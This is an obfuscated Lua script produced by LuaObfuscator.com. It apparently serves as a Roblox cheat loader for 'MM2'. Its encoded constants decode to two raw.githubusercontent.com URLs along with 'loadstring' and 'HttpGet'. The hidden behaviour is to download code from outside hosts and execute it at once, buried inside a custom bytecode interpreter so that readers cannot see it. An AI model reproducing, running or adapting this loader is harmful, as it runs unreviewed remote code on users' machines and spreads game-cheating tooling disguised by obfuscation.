--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v123=0;local v124;while true do if (v123==1) then return v124;end if (v123==0) then v124=v5(v87,v19);v19=nil;v123=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=0 -0 ;local v89;while true do if (v88==(0 -0)) then v89=(v31/((3 -1)^(v32-((1639 -(1523 + 114)) -1))))%((621 -(555 + 64))^(((v33-1) -(v32-(932 -(771 + 86 + 74)))) + (569 -(367 + 201)))) ;return v89-(v89%(928 -(214 + 713))) ;end end else local v90=0 + (0 -0) ;local v91;while true do if (v90==((1065 -(68 + 997)) + (1270 -(226 + 1044)))) then v91=2^(v32-(878 -(282 + 595))) ;return (((v31%(v91 + v91))>=v91) and 1) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (4 -1) + 0 );v18=v18 + 1 + 3 ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -90801)) + (v38 * ((822 -(87 + 263)) -216)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=181 -(67 + 113 + 0) ;local v44=(v20(v42,1 + (791 -(368 + 423)) ,(153 -104) -29 ) * (2^(24 + 8))) + v41 ;local v45=v20(v42,83 -62 ,983 -(802 + 150) );local v46=((v20(v42,85 -(71 -(10 + 8)) )==1) and  -1) or (1 -0) ;if (v45==0) then if (v44==(0 + (0 -0))) then return v46 * (997 -(915 + 82)) ;else v45=2 -1 ;v43=(442 -(416 + 26)) + 0 ;end elseif (v45==(2691 -644)) then return ((v44==((3789 -2602) -(1069 + 51 + 67))) and (v46 * ((2 -1)/0))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/((1 + 1)^(92 -40)))) ;end local function v25(v47) local v48;if  not v47 then local v92=0 -(0 + 0) ;while true do if (v92==(438 -(145 + 293))) then v47=v23();if (v47==(430 -(37 + 7 + 386))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(1487 -((1770 -(201 + 571)) + 488)) );v18=v18 + v47 ;local v49={};for v65=1, #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0 + 0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if ( #"!"~=v93) then else if (v94== #">") then v95=(function() return v96()~=0 ;end)();elseif (v94==(1 + 1)) then v95=(function() return v97();end)();elseif (v94== #"nil") then v95=(function() return v98();end)();end v99[v100]=(function() return v95;end)();break;end if (v93~=0) then else local v118=(function() return 202 -(14 + 188) ;end)();local v119=(function() return;end)();while true do if (v118==(675 -(534 + 141))) then v119=(function() return 0 + 0 ;end)();while true do if (v119~=(1 + 0)) then else v93=(function() return  #"[";end)();break;end if (v119~=(0 + 0)) then else v94=(function() return v96();end)();v95=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end end break;end end end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v51=(function() return function(v101,v102,v103) local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();while true do if (v104==0) then v105=(function() return 0;end)();while true do if (v105==0) then local v125=(function() return 0;end)();while true do if (v125~=0) then else v101[v102-#"}" ]=(function() return v103();end)();return v101,v102,v103;end end end end break;end end end;end)();local v52=(function() return {};end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {v52,v53,nil,v54};end)();local v56=(function() return v23();end)();local v57=(function() return {};end)();for v67= #",",v56 do FlatIdent_23BE8,Type,Cons,v21,v24,v25,v57,v67=(function() return v50(FlatIdent_23BE8,Type,Cons,v21,v24,v25,v57,v67);end)();end v55[ #"91("]=(function() return v21();end)();for v68= #"<",v23() do local v69=(function() return v21();end)();if (v20(v69, #"~", #"}")~=0) then else local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v108==1) then local v122=(function() return 0;end)();while true do if (v122~=(0 -0)) then else v111=(function() return nil;end)();v112=(function() return nil;end)();v122=(function() return 1;end)();end if (v122==(2 -1)) then v108=(function() return 2 + 0 ;end)();break;end end end if (v108~=(1638 -(1373 + 263))) then else while true do if (v109~=(2 + 0)) then else local v126=(function() return 0;end)();while true do if (v126~=(397 -(115 + 281))) then else v109=(function() return  #"-19";end)();break;end if (0==v126) then if (v20(v111, #"{", #"\\")== #"~") then v112[4 -2 ]=(function() return v57[v112[1 + 1 ]];end)();end if (v20(v111,2,2 -0 )== #"{") then v112[ #"asd"]=(function() return v57[v112[ #"xxx"]];end)();end v126=(function() return 1 + 0 ;end)();end end end if (v109== #"[") then local v127=(function() return 0 -0 ;end)();while true do if (v127==1) then v109=(function() return 7 -5 ;end)();break;end if (v127~=(0 -0)) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(867 -(550 + 317))) then local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (v176==(0 -0)) then v177=(function() return 0 + 0 ;end)();while true do if (0==v177) then v112[ #"xxx"]=(function() return v22();end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"\\") then v112[ #"91("]=(function() return v23();end)();elseif (v110==2) then v112[ #"asd"]=(function() return v23() -((562 -(306 + 254))^(22 -6)) ;end)();elseif (v110~= #"xxx") then else local v248=(function() return 0 -0 ;end)();local v249=(function() return;end)();while true do if (v248~=(0 -0)) then else v249=(function() return 285 -(134 + 151) ;end)();while true do if (v249~=0) then else v112[ #"asd"]=(function() return v23() -((1469 -(899 + 568))^(1681 -(970 + 695))) ;end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end end v127=(function() return 1 -0 ;end)();end end end if (v109~= #"asd") then else if (v20(v111, #"gha", #"asd")~= #"!") then else v112[ #"xnxx"]=(function() return v57[v112[ #"0313"]];end)();end v52[v68]=(function() return v112;end)();break;end if (v109~=(0 -0)) then else local v129=(function() return 1990 -(582 + 1408) ;end)();local v130=(function() return;end)();while true do if (v129==(603 -(268 + 335))) then v130=(function() return 0;end)();while true do if ((0 -0)==v130) then v110=(function() return v20(v69,2, #"asd");end)();v111=(function() return v20(v69, #"asd1",6);end)();v130=(function() return 1;end)();end if (v130==(1 -0)) then v109=(function() return  #",";end)();break;end end break;end end end end break;end if ((0 -0)==v108) then v109=(function() return 0;end)();v110=(function() return nil;end)();v108=(function() return 573 -(426 + 146) ;end)();end end end end for v70= #"[",v23() do v53,v70,v28=(function() return v51(v53,v70,v28);end)();end return v55;end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1458 -(282 + 1174) ];local v64=v59[814 -(569 + 242) ];return function(...) local v71=v62;local v72=v63;local v73=v64;local v74=v27;local v75=1126 -(936 + 189) ;local v76= -((1494 -(711 + 782)) + (0 -0));local v77={};local v78={...};local v79=v12("#",...) -(2 -(470 -(270 + 199))) ;local v80={};local v81={};for v106=0 + 0 ,v79 do if (v106>=v73) then v77[v106-v73 ]=v78[v106 + 1 + 0 ];else v81[v106]=v78[v106 + (1820 -(580 + 1239)) + 0 ];end end local v82=(v79-v73) + (1025 -(706 + 318)) ;local v83;local v84;while true do local v107=1251 -((2143 -1422) + 530) ;while true do if ((1272 -(945 + 326))==v107) then if (v84<=(16 -9)) then if (v84<=(7 -4)) then if (v84<=(1 + 0)) then if (v84==(700 -(271 + 429))) then local v133=0 + 0 ;local v134;local v135;local v136;while true do if (v133==0) then v134=v83[1502 -(1408 + 92) ];v135=v81[v134];v133=1087 -(461 + 625) ;end if ((v133==(1289 -(993 + 295))) or (4064<1819)) then v136=v83[1 + 2 ];for v231=1172 -(418 + 753) ,v136 do v135[v231]=v81[v134 + v231 ];end break;end end else v75=v83[1021 -(697 + 321) ];end elseif (v84==2) then local v138=v83[1 + 1 + 0 ];local v139={v81[v138](v81[v138 + 1 + 0 ])};local v140=0 + 0 ;for v178=v138,v83[(20 + 513) -(406 + 123) ] do v140=v140 + 1 + 0 ;v81[v178]=v139[v140];end else local v141=v83[1771 -(1749 + 20) ];local v142=v81[v141];for v181=v141 + 1 + 0 ,v83[1 + 2 ] do v7(v142,v81[v181]);end end elseif (v84<=(1327 -(1249 + 73))) then if ((v84>(2 + (4 -2))) or (4986<1574)) then v81[v83[1229 -(322 + 905) ]]=v61[v83[614 -(602 + 6 + 3) ]];else local v145=v83[1147 -(466 + 679) ];local v146=v83[9 -5 ];local v147=v145 + (949 -(245 + 702)) ;local v148={v81[v145](v81[v145 + (1901 -(106 + 1794)) ],v81[v147])};for v182=1 + (1167 -(645 + 522)) ,v146 do v81[v147 + v182 ]=v148[v182];end local v149=v148[1 + 0 ];if v149 then local v185=0 -0 ;while true do if (v185==(0 -(1790 -(1010 + 780)))) then v81[v147]=v149;v75=v83[117 -(4 + 110) ];break;end end else v75=v75 + (585 -(57 + 527)) ;end end elseif (v84>(1433 -(41 + 1386))) then local v150=103 -(17 + 86) ;local v151;local v152;while true do if (v150==(1 + 0)) then v81[v151 + (1 -0) ]=v152;v81[v151]=v152[v83[11 -7 ]];break;end if ((4426>172) and (v150==0)) then v151=v83[168 -(122 + 44) ];v152=v81[v83[5 -2 ]];v150=3 -2 ;end end else v81[v83[1692 -(1121 + 569 + 0) ]]=v83[217 -(22 + 192) ]~=(0 + 0) ;end elseif (v84<=(2 + 9)) then if ((586>455) and (v84<=(17 -8))) then if (v84>(73 -(30 + 35))) then local v154=765 -((2229 -1761) + 297) ;local v155;local v156;local v157;local v158;while true do if (v154==(2 + (0 -0))) then for v234=v155,v76 do local v235=1257 -(1043 + 214) ;while true do if ((826==826) and (v235==(0 -0))) then v158=v158 + (2 -1) ;v81[v234]=v156[v158];break;end end end break;end if (v154==1) then v76=(v157 + v155) -1 ;v158=1212 -((2159 -(1045 + 791)) + 889) ;v154=2;end if (v154==(0 -0)) then v155=v83[582 -(361 + 219) ];v156,v157=v74(v81[v155](v13(v81,v155 + (321 -(53 + 267)) ,v83[3])));v154=1;end end else v81[v83[1 + 1 ]]=v81[v83[(1052 -636) -((22 -7) + 398) ]];end elseif (v84==(25 -15)) then v81[v83[984 -(18 + 964) ]]=v83[3];else local v163=0 + 0 ;local v164;local v165;local v166;local v167;local v168;while true do if (v163==(18 -13)) then v83=v71[v75];v168=v83[(507 -(351 + 154)) + 0 ];v81[v168]=v81[v168](v13(v81,v168 + 1 + 0 ,v76));v75=v75 + ((2425 -(1281 + 293)) -(20 + 830)) ;v83=v71[v75];v163=5 + 1 ;end if (v163==(0 -0)) then v164=nil;v165,v166=nil;v167=nil;v168=nil;v81[v83[128 -(116 + 10) ]]=v61[v83[166 -(92 + 71) ]];v163=1 + 0 ;end if (v163==(742 -(542 + 196))) then v165,v166=v74(v81[v168](v13(v81,v168 + (1 -0) ,v83[(267 -(28 + 238)) + 2 ])));v76=(v166 + v168) -(1 + 0) ;v164=0 + (0 -0) ;for v236=v168,v76 do local v237=0 -0 ;while true do if (v237==(0 -0)) then v164=v164 + (1552 -((2685 -(1381 + 178)) + 425)) ;v81[v236]=v165[v164];break;end end end v75=v75 + 1 ;v163=854 -(254 + 595) ;end if (v163==(408 -(118 + 287))) then v83=v71[v75];v81[v83[(7 + 0) -5 ]]=v83[(907 + 217) -(118 + 1003) ]~=(0 -0) ;v75=v75 + (378 -(142 + 235)) ;v83=v71[v75];v168=v83[9 -7 ];v163=1 + 3 ;end if (v163==(941 -(714 + 225))) then v81[v168]=v167[v83[981 -(553 + 424) ]];v75=v75 + (1 -0) ;v83=v71[v75];v81[v83[1 + 1 + (0 -0) ]]=v81[v83[1 + 0 + 2 ]];v75=v75 + 1 + 0 ;v163=2 + 1 ;end if (v163==(3 + 3)) then v81[v83[2 + 0 ]]();break;end if ((v163==(2 -1)) or (4019>4441)) then v75=v75 + (2 -1) ;v83=v71[v75];v168=v83[4 -2 ];v167=v81[v83[3]];v81[v168 + 1 ]=v167;v163=3 -1 ;end end end elseif (v84<=(4 + 9)) then if (v84>(57 -45)) then do return;end else local v169=753 -(239 + 514) ;local v170;local v171;local v172;while true do if ((2017<4261) and (v169==(3 + 4))) then for v238=(1800 -(381 + 89)) -(797 + 532) ,v170 do v171[v238]=v81[v172 + v238 ];end break;end if ((4716>80) and (v169==(3 + 1))) then v81[v83[1 + 1 ]]=v83[6 -3 ];v75=v75 + (2 -1) ;v83=v71[v75];v169=(1071 + 136) -(253 + 120 + 829) ;end if (v169==(736 -(476 + (436 -181)))) then v81[v83[1132 -((1525 -(1074 + 82)) + 761) ]]=v83[2 + 1 ];v75=v75 + (1 -0) ;v83=v71[v75];v169=10 -4 ;end if ((v169==(244 -(64 + 174))) or (3507==3272)) then v172=v83[2 + 0 ];v171=v81[v172];v170=v83[1 + 2 ];v169=540 -((94 -51) + 490) ;end if (((0 -0)==v169) or (876>=3075)) then v170=nil;v171=nil;v172=nil;v169=337 -(144 + 192) ;end if (v169==(219 -(42 + (1958 -(214 + 1570))))) then v81[v83[2 + (1455 -(990 + 465)) ]]={};v75=v75 + 1 + 0 + 0 ;v83=v71[v75];v169=2 + 2 ;end if ((1505 -(363 + 1141))==v169) then v81[v83[1582 -(1183 + 397) ]]={};v75=v75 + (406 -(255 + 150)) ;v83=v71[v75];v169=5 -3 ;end if ((4352>2554) and ((2 + 0)==v169)) then v81[v83[8 -6 ]]=v61[v83[2 + 1 + 0 + 0 ]];v75=v75 + (1976 -(1913 + 62)) ;v83=v71[v75];v169=409 -(183 + 223) ;end end end elseif ((v84<=(9 + 5)) or (4406<4043)) then v81[v83[5 -3 ]]={};elseif ((v84==(1948 -(565 + 1368))) or (1889>=3383)) then v81[v83[7 -5 ]]();else local v186=(6536 -4875) -(1477 + 184) ;local v187;while true do if ((1892<=2734) and (v186==(0 -0))) then v187=v83[2 + 0 ];v81[v187]=v81[v187](v13(v81,v187 + ((2583 -(1668 + 58)) -(564 + 292)) ,v76));break;end end end v75=v75 + (1 -0) ;break;end if ((1923<2218) and (v107==(0 -0))) then v83=v71[v75];v84=v83[305 -((870 -(512 + 114)) + 60) ];v107=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q0003053Q00706169727303443Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A6C797865722F2Q4D322F726566732F68656164732F6D61696E2F6C6F6164696E67033E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41753079582F436F2Q6D756E6974792F6D61696E2F586875622Q4D32030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657400134Q000C7Q00122Q000100016Q000200023Q00122Q000300023Q00122Q000400036Q0002000200012Q00020001000200030004013Q00100001001205000600043Q00120B000700053Q00202Q0007000700064Q000900056Q000A00016Q0007000A6Q00063Q00024Q00060001000100060400010008000100020004013Q000800012Q000D3Q00017Q00",v9(),...);